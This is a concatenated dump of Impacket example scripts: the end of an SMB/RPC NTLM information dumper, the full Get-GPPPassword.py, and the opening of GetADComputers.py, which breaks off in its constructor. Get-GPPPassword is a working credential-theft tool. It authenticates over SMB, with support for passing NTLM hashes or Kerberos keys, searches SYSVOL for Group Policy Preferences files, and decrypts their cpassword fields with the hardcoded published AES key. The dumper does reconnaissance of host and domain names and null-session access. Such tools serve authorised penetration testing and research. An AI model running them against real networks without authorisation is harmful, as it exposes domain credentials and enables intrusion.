sessionSetup = self._createSessionSetupRequest()
packet.addCommand(sessionSetup)
self.send(packet)
packet = self.receive()
if packet.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX):
self._uid = packet['Uid']
sessionResponse = SMBCommand(packet['Data'][0])
sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters'])
sessionData = SMBSessionSetupAndX_Extended_Response_Data(flags = packet['Flags2'])
sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength']
sessionData.fromString(sessionResponse['Data'])
self._respToken = SPNEGO_NegTokenResp(sessionData['SecurityBlob'])
ntlmChallenge = ntlm.NTLMAuthChallenge(self._respToken['ResponseToken'])
return ntlmChallenge
def Authenticate(self):
type3, _ = ntlm.getNTLMSSPType3(self._auth, self._respToken['ResponseToken'], '', '', '', '', '', use_ntlmv2=True)
packet = NewSMBPacket()
if self._SignatureRequired:
packet['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = type3.getData()
sessionSetup = self._createSessionSetupRequest()
sessionSetup['Parameters']['SecurityBlobLength'] = len(respToken2)
sessionSetup['Data']['SecurityBlob'] = respToken2.getData()
packet.addCommand(sessionSetup)
self.send(packet)
packet = self.receive()
try:
if packet.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX):
sessionResponse = SMBCommand(packet['Data'][0])
sessionParameters = SMBSessionSetupAndXResponse_Parameters(sessionResponse['Parameters'])
self._action = sessionParameters['Action']
return True
except:
pass
return False
def send(self, negoPacket):
negoPacket['Uid'] = self._uid
negoPacket['Pid'] = (os.getpid() & 0xFFFF)
negoPacket['Flags1'] |= self.__flags1
negoPacket['Flags2'] |= self.__flags2
self._session.send_packet(negoPacket.getData())
def receive(self):
r = self._session.recv_packet(self.__timeout)
return NewSMBPacket(data = r.get_trailer())
def _negotiateSession(self, negPacket = None):
def parsePacket(negoPacket):
if negoPacket['Flags2'] & SMB.FLAGS2_UNICODE:
self.__flags2 |= SMB.FLAGS2_UNICODE
if negoPacket.isValidAnswer(SMB.SMB_COM_NEGOTIATE):
sessionResponse = SMBCommand(negoPacket['Data'][0])
self._dialects_parameters = SMBNTLMDialect_Parameters(sessionResponse['Parameters'])
self._dialects_data = SMBNTLMDialect_Data()
self._dialects_data['ChallengeLength'] = self._dialects_parameters['ChallengeLength']
self._dialects_data.fromString(sessionResponse['Data'])
if self._dialects_parameters['Capabilities'] & SMB.CAP_EXTENDED_SECURITY:
self._dialects_parameters = SMBExtended_Security_Parameters(sessionResponse['Parameters'])
self._dialects_data = SMBExtended_Security_Data(sessionResponse['Data'])
if self._dialects_parameters['SecurityMode'] & SMB.SECURITY_SIGNATURES_REQUIRED:
self._SignatureRequired = True
else:
if self._dialects_parameters['DialectIndex'] == 0xffff:
raise UnsupportedFeature("Remote server does not know NT LM 0.12")
return self._wrapper(sessionResponse)
if negPacket is None:
negoPacket = NewSMBPacket()
negSession = SMBCommand(SMB.SMB_COM_NEGOTIATE)
self.__flags2 = self.__flags2 | SMB.FLAGS2_EXTENDED_SECURITY
negSession['Data'] = b'\x02NT LM 0.12\x00'
negoPacket.addCommand(negSession)
self.send(negoPacket)
negoPacket = self.receive()
return parsePacket(negoPacket)
return parsePacket(NewSMBPacket(data = negPacket))
def _createSessionSetupRequest(self):
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Parameters']['MaxBufferSize'] = 61440
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE | SMB.CAP_LARGE_READX | SMB.CAP_LARGE_WRITEX
blob = SPNEGO_NegTokenInit()
blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
self._auth = ntlm.getNTLMSSPType1(self._my_name, '', self._SignatureRequired, use_ntlmv2=True)
blob['MechToken'] = self._auth.getData()
sessionSetup['Parameters']['SecurityBlobLength'] = len(blob)
sessionSetup['Parameters'].getData()
sessionSetup['Data']['SecurityBlob'] = blob.getData()
sessionSetup['Data']['NativeOS'] = 'U\x00n\x00i\x00x\x00\x00\x00'
sessionSetup['Data']['NativeLanMan'] = 'S\x00a\x00m\x00b\x00a\x00\x00'
return sessionSetup
def _wrapper(self, sessionResponse):
sessionResponse['SecurityMode'] = 0x0
sessionResponse['DialectRevision'] = SMB_DIALECT
if self._dialects_parameters['SecurityMode'] & SMB.SECURITY_SIGNATURES_ENABLED:
sessionResponse['SecurityMode'] = SMB2_NEGOTIATE_SIGNING_ENABLED
if self._SignatureRequired:
sessionResponse['SecurityMode'] |= SMB2_NEGOTIATE_SIGNING_REQUIRED
sessionResponse['MaxReadSize'] = self._dialects_parameters['MaxBufferSize']
sessionResponse['MaxWriteSize'] = self._dialects_parameters['MaxBufferSize']
sessionResponse['SystemTime'] = self._to_long_filetime(self._dialects_parameters['LowDateTime'], self._dialects_parameters['HighDateTime'])
sessionResponse['ServerStartTime'] = 0 # SMB1 has not boot time totally
return sessionResponse
def _to_long_filetime(self, dwLowDateTime, dwHighDateTime):
temp_time = dwHighDateTime
temp_time <<= 32
temp_time |= dwLowDateTime
return temp_time
class SMB3:
def __init__(self, remote_name, remote_host, my_name=None,
sess_port=445, timeout=60, session=None, negSessionResponse=None):
self._NetBIOSSession = session
self._sequenceWindow = 0
self._sessionId = 0
self._timeout = timeout
self._auth = None
if session is None:
self._NetBIOSSession = nmb.NetBIOSTCPSession(my_name, remote_name, remote_host, nmb.TYPE_SERVER, sess_port, timeout)
else:
self._sequenceWindow += 1
self._negotiateResponse = self._negotiateSession(negSessionResponse)
def GetNegotiateResponse(self):
return self._negotiateResponse
def GetChallange(self):
packet = self._createSessionSetupRequest(self._negotiateResponse['DialectRevision'])
self.send(packet)
self._answer = self.receive()
sessionSetupResponse = SMB2SessionSetup_Response(self._answer['Data'])
self._respToken = SPNEGO_NegTokenResp(sessionSetupResponse['Buffer'])
ntlmChallenge = ntlm.NTLMAuthChallenge(self._respToken['ResponseToken'])
return ntlmChallenge
def Authenticate(self):
packet = SMB2Packet()
if self.GetNegotiateResponse()['DialectRevision'] >= SMB2_DIALECT_30:
packet = SMB3Packet()
packet['Command'] = SMB2_SESSION_SETUP
if self._answer.isValidAnswer(STATUS_MORE_PROCESSING_REQUIRED):
self._sessionId = self._answer['SessionID']
type3, _ = ntlm.getNTLMSSPType3(self._auth, self._respToken['ResponseToken'], '', '', '', '', '')
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = type3.getData()
sessionSetup = SMB2SessionSetup()
sessionSetup['SecurityMode'] = SMB2_NEGOTIATE_SIGNING_ENABLED
sessionSetup['SecurityBufferLength'] = len(respToken2)
sessionSetup['Buffer'] = respToken2.getData()
packet['Data'] = sessionSetup
self.send(packet)
packet = self.receive()
try:
return packet.isValidAnswer(STATUS_SUCCESS)
except:
return False
def send(self, packet):
packet['MessageID'] = self._sequenceWindow
self._sequenceWindow += 1
packet['SessionID'] = self._sessionId
packet['CreditCharge'] = 1
messageId = packet['MessageID']
data = packet.getData()
self._NetBIOSSession.send_packet(data)
return messageId
def receive(self):
data = self._NetBIOSSession.recv_packet(self._timeout)
packet = SMB2Packet(data.get_trailer())
return packet
def _negotiateSession(self, negSessionResponse = None):
currentDialect = SMB2_DIALECT_WILDCARD
if negSessionResponse is not None:
negotiateResponse = SMB2Negotiate_Response(negSessionResponse['Data'])
currentDialect = negotiateResponse['DialectRevision']
if currentDialect == SMB2_DIALECT_WILDCARD:
packet = SMB2Packet()
packet['Command'] = SMB2_NEGOTIATE
negSession = SMB2Negotiate()
negSession['SecurityMode'] = SMB2_NEGOTIATE_SIGNING_ENABLED
negSession['Capabilities'] = SMB2_GLOBAL_CAP_ENCRYPTION
negSession['ClientGuid'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
negSession['Dialects'] = [SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30]
negSession['DialectCount'] = len(negSession['Dialects'])
packet['Data'] = negSession
self.send(packet)
answer = self.receive()
if answer.isValidAnswer(STATUS_SUCCESS):
negotiateResponse = SMB2Negotiate_Response(answer['Data'])
return negotiateResponse
def _createSessionSetupRequest(self, dialect):
sessionSetup = SMB2SessionSetup()
sessionSetup['Flags'] = 0
blob = SPNEGO_NegTokenInit()
blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
self._auth = ntlm.getNTLMSSPType1('', '', False)
blob['MechToken'] = self._auth.getData()
sessionSetup['SecurityBufferLength'] = len(blob)
sessionSetup['Buffer'] = blob.getData()
packet = SMB2Packet()
if dialect >= SMB2_DIALECT_30:
packet = SMB3Packet()
packet['Command'] = SMB2_SESSION_SETUP
packet['Data'] = sessionSetup
return packet
class SmbConnection:
def __init__(self, ip, hostname, port) -> None:
self.target = ip
self.hostname = hostname
self._sess_port = int(port)
self._timeout = 60
self._myName = self._get_my_name()
self._nmbSession = None
self._SMBConnection = None
def IsSmb1Enabled(self):
flags1 = SMB.FLAGS1_PATHCASELESS | SMB.FLAGS1_CANONICALIZED_PATHS
flags2 = SMB.FLAGS2_EXTENDED_SECURITY | SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_LONG_NAMES
smbv1NegoData = '\x02NT LM 0.12\x00'
smb1_enabled = False
try:
self._negotiateSessionWildcard(True, flags1=flags1, flags2=flags2, data=smbv1NegoData)
except Exception as e:
if 'No answer!' in str(e):
smb1_enabled = False
else:
smb1_enabled = True
return smb1_enabled
def NegotiateSession(self):
flags1 = SMB.FLAGS1_PATHCASELESS | SMB.FLAGS1_CANONICALIZED_PATHS
flags2 = SMB.FLAGS2_EXTENDED_SECURITY | SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_LONG_NAMES
negoData = '\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00'
if self._sess_port == nmb.NETBIOS_SESSION_PORT:
negoData = '\x02NT LM 0.12\x00\x02SMB 2.002\x00'
packet = self._negotiateSessionWildcard(True, flags1=flags1, flags2=flags2, data=negoData)
if packet[0:1] == b'\xfe':
self._SMBConnection = SMB3(self.hostname, self.target, self._myName, self._sess_port,
self._timeout, session=self._nmbSession, negSessionResponse=SMB2Packet(packet))
else:
self._SMBConnection = SMB1(self.hostname, self.target, self._myName, self._sess_port,
self._timeout, session=self._nmbSession, negSessionResponse=packet)
return self._SMBConnection.GetNegotiateResponse()
def GetChallange(self):
return self._SMBConnection.GetChallange()
def Authenticate(self):
return self._SMBConnection.Authenticate()
def _negotiateSessionWildcard(self, extended_security=True, flags1=0, flags2=0, data=None):
tries = 0
smbp = NewSMBPacket()
smbp['Flags1'] = flags1
smbp['Flags2'] = flags2 | SMB.FLAGS2_UNICODE
response = None
while tries < 2:
self._nmbSession = nmb.NetBIOSTCPSession(self._myName, self.hostname, self.target, nmb.TYPE_SERVER, self._sess_port, self._timeout)
negSession = SMBCommand(SMB.SMB_COM_NEGOTIATE)
if extended_security is True:
smbp['Flags2'] |= SMB.FLAGS2_EXTENDED_SECURITY
negSession['Data'] = data
smbp.addCommand(negSession)
self._nmbSession.send_packet(smbp.getData())
try:
response = self._nmbSession.recv_packet(self._timeout)
break
except nmb.NetBIOSError:
smbp['Flags2'] |= SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_LONG_NAMES | SMB.FLAGS2_UNICODE
smbp['Data'] = []
tries += 1
if response is None:
raise Exception('No answer!')
return response.get_trailer()
def _get_my_name(self):
myName = socket.gethostname()
i = myName.find('.')
if i > -1:
myName = myName[:i]
return myName
class DumpNtlm:
def __init__(self, ip, hostname, port, protocol) -> None:
self.target = ip
self.hostname = hostname
self._sess_port = int(port)
self._protocol = protocol
self._timeout = 60
def DisplayInfo(self):
if self._protocol == 'SMB':
self.DisplaySmbInfo()
elif self._protocol == 'RPC':
self.DisplayRpcInfo()
def DisplayRpcInfo(self):
rpc = RPC(self.target)
ntlmChallenge = rpc.GetChallange()
self.DisplayChallangeInfo(ntlmChallenge)
self.DisplayIo({'MaxReadSize': rpc.MaxTrasmitionSize, 'MaxWriteSize': rpc.MaxTrasmitionSize})
def DisplaySmbInfo(self):
connection = SmbConnection(self.target, self.hostname, self._sess_port)
negotiation = connection.NegotiateSession()
dialect = negotiation['DialectRevision']
secMode = negotiation['SecurityMode']
smb1_enabled = connection.IsSmb1Enabled()
self.DisplayDialect(dialect, smb1_enabled)
self.DisplaySigning(secMode)
self.DisplayIo(negotiation)
self.DisplayTime(negotiation)
ntlmChallenge = connection.GetChallange()
self.DisplayChallangeInfo(ntlmChallenge)
nullSession = connection.Authenticate()
self.DisplayNullSession(nullSession)
def DisplaySigning(self, secMode):
mode = ''
if (secMode & SMB2_NEGOTIATE_SIGNING_ENABLED) == SMB2_NEGOTIATE_SIGNING_ENABLED:
mode = 'SIGNING_ENABLED'
if (secMode & SMB2_NEGOTIATE_SIGNING_REQUIRED) == SMB2_NEGOTIATE_SIGNING_REQUIRED:
mode += ' | SIGNING_REQUIRED'
else:
mode += ' (not required)'
print("[+] Server Security : {}".format(mode))
def DisplayDialect(self, dialect, smb1_enabled):
print("[+] SMBv1 Enabled : {0}".format(smb1_enabled))
if dialect == SMB2_DIALECT_002:
print("[+] Prefered Dialect: SMB 002")
elif dialect == SMB2_DIALECT_21:
print("[+] Prefered Dialect: SMB 2.1")
elif dialect == SMB2_DIALECT_30:
print("[+] Prefered Dialect: SMB 3.0")
elif dialect == SMB2_DIALECT_302:
print("[+] Prefered Dialect: SMB 3.0.2")
elif dialect == SMB2_DIALECT_302:
print("[+] Prefered Dialect: SMB 3.0.2")
elif dialect == SMB2_DIALECT_311:
print("[+] Prefered Dialect: SMB 3.1.1")
elif type(dialect) is str:
print("[+] Prefered Dialect: {}".format(dialect)) # SMB1
else:
print("[+] Prefered Dialect: 0x{:x}".format(dialect))
def DisplayIo(self, negotiateResponse):
print("[+] Max Read Size : {} ({} bytes)".format(self.__convert_size(negotiateResponse['MaxReadSize']), negotiateResponse['MaxReadSize']))
print("[+] Max Write Size : {} ({} bytes)".format(self.__convert_size(negotiateResponse['MaxWriteSize']), negotiateResponse['MaxWriteSize']))
def DisplayTime(self, negotiateResponse):
currentTime = 0 if negotiateResponse['SystemTime'] == 0 else self.__filetime_to_dt(negotiateResponse['SystemTime']).astimezone(timezone.utc)
bootTime = 0 if negotiateResponse['ServerStartTime'] == 0 else self.__filetime_to_dt(negotiateResponse['ServerStartTime']).astimezone(timezone.utc)
print("[+] Current Time : {}".format(currentTime))
if bootTime != 0:
print("[+] Boot Time : {}".format(bootTime))
print("[+] Server Up Time : {}".format(currentTime - bootTime))
def DisplayChallangeInfo(self, challange):
if challange['TargetInfoFields_len'] > 0:
av_pairs = ntlm.AV_PAIRS(challange['TargetInfoFields'][:challange['TargetInfoFields_len']])
if av_pairs[ntlm.NTLMSSP_AV_HOSTNAME] is not None:
try:
print("[+] Name : {}".format(av_pairs[ntlm.NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')))
except:
pass
if av_pairs[ntlm.NTLMSSP_AV_DOMAINNAME] is not None:
try:
print("[+] Domain : {}".format(av_pairs[ntlm.NTLMSSP_AV_DOMAINNAME][1].decode('utf-16le')))
except:
pass
if av_pairs[ntlm.NTLMSSP_AV_DNS_TREENAME] is not None:
try:
print("[+] DNS Tree Name : {}".format(av_pairs[ntlm.NTLMSSP_AV_DNS_TREENAME][1].decode('utf-16le')))
except:
pass
if av_pairs[ntlm.NTLMSSP_AV_DNS_DOMAINNAME] is not None:
try:
print("[+] DNS Domain Name : {}".format(av_pairs[ntlm.NTLMSSP_AV_DNS_DOMAINNAME][1].decode('utf-16le')))
except:
pass
if av_pairs[ntlm.NTLMSSP_AV_DNS_HOSTNAME] is not None:
try:
print("[+] DNS Host Name : {}".format(av_pairs[ntlm.NTLMSSP_AV_DNS_HOSTNAME][1].decode('utf-16le')))
except:
pass
# if av_pairs[ntlm.NTLMSSP_AV_TIME] is not None:
# try:
# timelong = struct.unpack('<q', av_pairs[ntlm.NTLMSSP_AV_TIME][1])[0]
# print("[+] Time : {}".format(self.__filetime_to_dt(timelong).astimezone(timezone.utc)))
# except:
# pass
if 'Version' in challange.fields:
version = challange['Version']
if len(version) >= 4:
print("[+] OS : {}".format("Windows NT %d.%d Build %d" % (indexbytes(version,0), indexbytes(version,1), struct.unpack('<H',version[2:4])[0])))
def DisplayNullSession(self, nullSession):
print("[+] Null Session : {}".format(nullSession))
# https://stackoverflow.com/questions/38878647/python-convert-filetime-to-datetime-for-dates-before-1970
def __filetime_to_dt(self, filetime):
us = (filetime - EPOCH_AS_FILETIME) // 10
return datetime(1970, 1, 1) + timedelta(microseconds = us)
# https://stackoverflow.com/questions/5194057/better-way-to-convert-file-sizes-in-python
def __convert_size(self, size_bytes):
if size_bytes == 0:
return "0B"
size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
i = int(math.floor(math.log(size_bytes, 1024)))
p = math.pow(1024, i)
s = round(size_bytes / p, 2)
return "%s %s" % (s, size_name[i])
if __name__ == '__main__':
print(version.BANNER)
parser = argparse.ArgumentParser(add_help = True, description = "Do ntlm authentication and parse information.")
parser.add_argument('target', action='store', help='<targetName or address>')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-target-ip', action='store', metavar="ip address",
help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
'This is useful when target is the NetBIOS name and you cannot resolve it')
parser.add_argument('-port', type=int, default=445, metavar="destination port",
help='Destination port to connect to SMB/RPC Server')
parser.add_argument('-protocol', choices=['SMB', 'RPC'], nargs='?', metavar="protocol",
help='Protocol to use (SMB or RPC). Default is SMB, port 135 uses RPC normally.')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
logger.init(options.ts, options.debug)
if options.port == 135:
if not options.protocol:
options.protocol = 'RPC'
logging.info("Port 135 specified; using RPC protocol by default. Use `-protocol SMB` to force SMB protocol.")
elif options.protocol == 'SMB':
logging.info("Port 135 specified with SMB protocol. Are you sure you don't want `-protocol RPC`?")
elif not options.protocol:
options.protocol = 'SMB'
logging.info("Defaulting to SMB protocol.")
try:
if options.target_ip is not None:
dumper = DumpNtlm(options.target_ip, options.target, int(options.port), options.protocol)
else:
dumper = DumpNtlm(options.target, options.target, int(options.port), options.protocol)
logging.info("Using target: %s, IP: %s, Port: %d, Protocol: %s" % (options.target, options.target_ip or options.target, options.port, options.protocol) )
dumper.DisplayInfo()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(str(e))
================================================
FILE: examples/Get-GPPPassword.py
================================================
#!/usr/bin/env python3
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# Python script for extracting and decrypting Group Policy Preferences passwords,
# using Impacket's lib, and using streams for carving files instead of mounting shares
# https://podalirius.net/en/articles/exploiting-windows-group-policy-preferences/
#
# Authors:
# Remi Gascou (@podalirius_)
# Charlie Bromberg (@_nwodtuhs)
#
import argparse
import base64
import xml
import charset_normalizer
import logging
import os
import re
import sys
import traceback
from xml.dom import minidom
import io
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import unpad
from impacket import version
from impacket.examples import logger, utils
from impacket.smbconnection import SMBConnection, SMB2_DIALECT_002, SMB2_DIALECT_21, SMB_DIALECT, SessionError
class GetGPPasswords(object):
"""docstring for GetGPPasswords."""
def __init__(self, smb, share):
super(GetGPPasswords, self).__init__()
self.smb = smb
self.share = share
def list_shares(self):
logging.info("Listing shares...")
resp = self.smb.listShares()
shares = []
for k in range(len(resp)):
shares.append(resp[k]["shi1_netname"][:-1])
print(" - %s" % resp[k]["shi1_netname"][:-1])
print()
def find_cpasswords(self, base_dir, extension="xml"):
logging.info("Searching *.%s files..." % extension)
# Breadth-first search algorithm to recursively find .extension files
files = []
searchdirs = [base_dir + "/"]
while len(searchdirs) != 0:
next_dirs = []
for sdir in searchdirs:
logging.debug("Searching in %s " % sdir)
try:
for sharedfile in self.smb.listPath(self.share, sdir + "*", password=None):
if sharedfile.get_longname() not in [".", ".."]:
if sharedfile.is_directory():
logging.debug("Found directory %s/" % sharedfile.get_longname())
next_dirs.append(sdir + sharedfile.get_longname() + "/")
else:
if sharedfile.get_longname().endswith("." + extension):
logging.debug("Found matching file %s" % (sdir + sharedfile.get_longname()))
results = self.parse(sdir + sharedfile.get_longname())
if len(results) != 0:
self.show(results)
files.append({"filename": sdir + sharedfile.get_longname(), "results": results})
else:
logging.debug("Found file %s" % sharedfile.get_longname())
except SessionError as e:
logging.debug(e)
searchdirs = next_dirs
logging.debug("Next iteration with %d folders." % len(next_dirs))
return files
def parse_xmlfile_content(self, filename, filecontent):
results = []
try:
root = minidom.parseString(filecontent)
xmltype = root.childNodes[0].tagName
# function to get attribute if it exists, returns "" if empty
read_or_empty = lambda element, attribute: (element.getAttribute(attribute) if element.getAttribute(attribute) is not None else "")
# ScheduledTasks
if xmltype == "ScheduledTasks":
for topnode in root.childNodes:
task_nodes = [c for c in topnode.childNodes if isinstance(c, xml.dom.minidom.Element)]
for task in task_nodes:
for property in task.getElementsByTagName("Properties"):
results.append({
"tagName": xmltype,
"attributes": [
("name", read_or_empty(task, "name")),
("runAs", read_or_empty(property, "runAs")),
("cpassword", read_or_empty(property, "cpassword")),
("password", self.decrypt_password(read_or_empty(property, "cpassword"))),
("changed", read_or_empty(property.parentNode, "changed")),
],
"file": filename
})
elif xmltype == "Groups":
for topnode in root.childNodes:
task_nodes = [c for c in topnode.childNodes if isinstance(c, xml.dom.minidom.Element)]
for task in task_nodes:
for property in task.getElementsByTagName("Properties"):
results.append({
"tagName": xmltype,
"attributes": [
("newName", read_or_empty(property, "newName")),
("userName", read_or_empty(property, "userName")),
("cpassword", read_or_empty(property, "cpassword")),
("password", self.decrypt_password(read_or_empty(property, "cpassword"))),
("changed", read_or_empty(property.parentNode, "changed")),
],
"file": filename
})
else:
for topnode in root.childNodes:
task_nodes = [c for c in topnode.childNodes if isinstance(c, xml.dom.minidom.Element)]
for task in task_nodes:
for property in task.getElementsByTagName("Properties"):
results.append({
"tagName": xmltype,
"attributes": [
("newName", read_or_empty(property, "newName")),
("userName", read_or_empty(property, "userName")),
("cpassword", read_or_empty(property, "cpassword")),
("password", self.decrypt_password(read_or_empty(property, "cpassword"))),
("changed", read_or_empty(property.parentNode, "changed")),
],
"file": filename
})
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
traceback.print_exc()
logging.debug(str(e))
return results
def parse(self, filename):
results = []
filename = filename.replace("/", "\\")
fh = io.BytesIO()
try:
# opening the files in streams instead of mounting shares allows for running the script from
# unprivileged containers
self.smb.getFile(self.share, filename, fh.write)
except SessionError as e:
logging.error(e)
return results
except Exception as e:
raise
output = fh.getvalue()
encoding = charset_normalizer.detect(output)["encoding"]
if encoding is not None:
filecontent = output.decode(encoding).rstrip()
if "cpassword" in filecontent:
logging.debug(filecontent)
results = self.parse_xmlfile_content(filename, filecontent)
fh.close()
else:
logging.debug("No cpassword was found in %s" % filename)
else:
logging.debug("Output cannot be correctly decoded, are you sure the text is readable ?")
fh.close()
return results
def decrypt_password(self, pw_enc_b64):
if len(pw_enc_b64) != 0:
# Thank you Microsoft for publishing the key :)
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be
key = b"\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
# Thank you Microsoft for using a fixed IV :)
iv = b"\x00" * 16
pad = len(pw_enc_b64) % 4
if pad == 1:
pw_enc_b64 = pw_enc_b64[:-1]
elif pad == 2 or pad == 3:
pw_enc_b64 += "=" * (4 - pad)
pw_enc = base64.b64decode(pw_enc_b64)
ctx = AES.new(key, AES.MODE_CBC, iv)
pw_dec = unpad(ctx.decrypt(pw_enc), ctx.block_size)
return pw_dec.decode("utf-16-le")
else:
logging.debug("cpassword is empty, cannot decrypt anything.")
return ""
def show(self, results):
for result in results:
logging.info("Found a %s XML file:" % result['tagName'])
logging.info(" %-10s: %s" % ("file", result['file']))
for attr, value in result['attributes']:
if attr != "cpassword":
logging.info(" %-10s: %s" % (attr, value))
print()
def parse_args():
parser = argparse.ArgumentParser(add_help=True, description="Group Policy Preferences passwords finder and decryptor.")
parser.add_argument("target", action="store", help="[[domain/]username[:password]@]<targetName or address> or LOCAL (if you want to parse local files)")
parser.add_argument("-xmlfile", type=str, required=False, default=None, help="Group Policy Preferences XML files to parse")
parser.add_argument("-share", type=str, required=False, default="SYSVOL", help="SMB Share")
parser.add_argument("-base-dir", type=str, required=False, default="/", help="Directory to search in (Default: /)")
parser.add_argument("-ts", action="store_true", help="Adds timestamp to every logging output")
parser.add_argument("-debug", action="store_true", help="Turn DEBUG output ON")
group = parser.add_argument_group('authentication')
group.add_argument("-hashes", action="store", metavar="LMHASH:NTHASH", help="NTLM hashes, format is LMHASH:NTHASH")
group.add_argument("-no-pass", action="store_true", help="Don't ask for password (useful for -k)")
group.add_argument("-k", action="store_true", help="Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line")
group.add_argument("-aesKey", action="store", metavar="hex key", help="AES key to use for Kerberos Authentication (128 or 256 bits)")
group = parser.add_argument_group("connection")
group.add_argument("-dc-ip", action="store", metavar="ip address", help="IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter")
group.add_argument("-target-ip", action="store", metavar="ip address", help="IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it")
group.add_argument("-port", choices=["139", "445"], nargs="?", default="445", metavar="destination port", help="Destination port to connect to SMB Server")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
return parser.parse_args()
def parse_target(args):
domain, username, password, address = utils.parse_target(args.target)
if args.target_ip is None:
args.target_ip = address
if domain is None:
domain = ""
if len(password) == 0 and len(username) != 0 and args.hashes is None and args.no_pass is False and args.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if args.aesKey is not None:
args.k = True
if args.hashes is not None:
lmhash, nthash = args.hashes.split(":")
else:
lmhash, nthash = "", ""
return domain, username, password, address, lmhash, nthash
def init_smb_session(args, domain, username, password, address, lmhash, nthash):
smbClient = SMBConnection(address, args.target_ip, sess_port=int(args.port))
dialect = smbClient.getDialect()
if dialect == SMB_DIALECT:
logging.debug("SMBv1 dialect used")
elif dialect == SMB2_DIALECT_002:
logging.debug("SMBv2.0 dialect used")
elif dialect == SMB2_DIALECT_21:
logging.debug("SMBv2.1 dialect used")
else:
logging.debug("SMBv3.0 dialect used")
if args.k is True:
smbClient.kerberosLogin(username, password, domain, lmhash, nthash, args.aesKey, args.dc_ip)
else:
smbClient.login(username, password, domain, lmhash, nthash)
if smbClient.isGuestSession() > 0:
logging.debug("GUEST Session Granted")
else:
logging.debug("USER Session Granted")
return smbClient
if __name__ == '__main__':
print(version.BANNER)
args = parse_args()
logger.init(args.ts, args.debug)
if args.target.upper() == "LOCAL":
if args.xmlfile is not None:
# Only given decrypt XML file
if os.path.exists(args.xmlfile):
g = GetGPPasswords(None, None)
logging.debug("Opening %s XML file for reading ..." % args.xmlfile)
f = open(args.xmlfile, "r")
rawdata = "".join(f.readlines())
f.close()
results = g.parse_xmlfile_content(args.xmlfile, rawdata)
g.show(results)
else:
print("[!] File does not exists or is not readable.")
else:
domain, username, password, address, lmhash, nthash = parse_target(args)
try:
smbClient = init_smb_session(args, domain, username, password, address, lmhash, nthash)
g = GetGPPasswords(smbClient, args.share)
g.list_shares()
g.find_cpasswords(args.base_dir)
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
traceback.print_exc()
logging.error(str(e))
================================================
FILE: examples/GetADComputers.py
================================================
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# This script is inspired from Alberto Solino's -> imacket-GetAdUsers.
# This script will make a LDAP query to DC and gather information about all the COMPUTERS present in DC.
# Also, has the capablity of resolving the IP addresses of the idenitifed hosts by making a DNS query of A record to the DC.
#
# Inspired from author:
# Alberto Solino (@agsolino)
#
# Author:
# Fowz Masood (https://www.linkedin.com/in/f-masood/)
# Please let me know of any improvements / suggestions or bugs.
#
#
# Reference for:
# LDAP
#
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import logging
import sys
import dns.resolver
from datetime import datetime
from impacket import version
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE
from impacket.examples import logger
from impacket.examples.utils import parse_identity, ldap_login
from impacket.ldap import ldap, ldapasn1
class GetADComputers:
def __init__(self, username, password, domain, cmdLineOptions):
self.options = cmdLineOptions
self.__username = username
self.__password = password
self.__domain = domain
self.__target = None
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = cmdLineOptions.aesKey
